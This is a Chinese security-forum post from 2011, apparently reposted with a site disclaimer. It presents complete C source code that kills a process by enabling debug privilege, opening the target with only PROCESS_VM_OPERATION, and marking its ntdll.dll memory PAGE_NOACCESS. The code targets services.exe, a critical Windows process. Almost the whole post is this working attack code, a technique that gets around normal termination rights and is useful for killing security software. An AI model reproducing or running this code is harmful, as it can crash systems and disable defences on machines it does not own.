利用NtProtectVirtualMemory结束进程

标 题 : 【原创】利用NtProtectVirtualMemory结束进程
作 者 : KiDebug
时 间 : 2011 - 07 - 13, 09 : 37 : 08
链 接 : http ://bbs.pediy.com/showthread.php?t=137067
 
原理很简单,用PROCESS_VM_OPERATION打开目标进程(没必要PROCESS_ALL_ACCESS),把目标进程的ntdll.dll设为不能访问
/*
* 【作者:KiDebug】
* 【空间:http://hi.baidu.com/KiDebug/】
*  VC 6.0编译出错请百度:“vc 6.0 unicode”
*/
#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>
#include <Tlhelp32.h>
 
#pragma comment(lib,"Psapi.lib")
 
typedef NTSTATUS(__stdcall *RtlAdjustPrivilege_)(
ULONG Privilege,
BOOLEAN Enable,
BOOLEAN CurrentThread,
PBOOLEAN Enabled
);
RtlAdjustPrivilege_ RtlAdjustPrivilege = NULL;
 
typedef NTSTATUS(__stdcall *NtProtectVirtualMemory_)(
    __in HANDLE ProcessHandle,
    __inout PVOID *BaseAddress,
    __inout PSIZE_T RegionSize,
    __in ULONG NewProtectWin32,
    __out PULONG OldProtect
    );
NtProtectVirtualMemory_ NtProtectVirtualMemory = NULL;
 
ULONG GetPID(WCHAR* proc)
{
    BOOL                working = 0;
    PROCESSENTRY32      lppe = { 0 };
    ULONG               targetPid = 0;
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 
    if (hSnapshot)
    {
        lppe.dwSize = sizeof(lppe);
        working = Process32First(hSnapshot, &lppe);
        while (working)
        {
            if (_wcsicmp(lppe.szExeFile, proc) == 0)
            {
                targetPid = lppe.th32ProcessID;
                break;
            }
            working = Process32Next(hSnapshot, &lppe);
        }
    }
 
    CloseHandle(hSnapshot);
    return targetPid;
}
 
 
void main()
{
    HMODULE     ntdll;
    MODULEINFO  ModuleInfo;
    ntdll = GetModuleHandle(L"ntdll.dll");
    if (!GetModuleInformation((HANDLE)-1, ntdll, &ModuleInfo, sizeof(MODULEINFO)))
    {
        return;
    }
 
    BOOLEAN         Enabled;
    RtlAdjustPrivilege = (RtlAdjustPrivilege_)GetProcAddress(ntdll, "RtlAdjustPrivilege");
    if (RtlAdjustPrivilege == NULL)
    {
        return;
    }
 
    RtlAdjustPrivilege(20, TRUE, FALSE, &Enabled);
 
 
    HANDLE hProc = OpenProcess(PROCESS_VM_OPERATION, FALSE, GetPID(L"services.exe"));
    if (hProc == NULL)
    {
        return;
    }
 
    NtProtectVirtualMemory = (NtProtectVirtualMemory_)GetProcAddress(ntdll, "NtProtectVirtualMemory");
    if (NtProtectVirtualMemory == NULL)
    {
        return;
    }
 
    ULONG   OldProtect;
    NtProtectVirtualMemory(hProc, &ModuleInfo.lpBaseOfDll, &ModuleInfo.SizeOfImage, PAGE_NOACCESS, &OldProtect);
}

 

郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。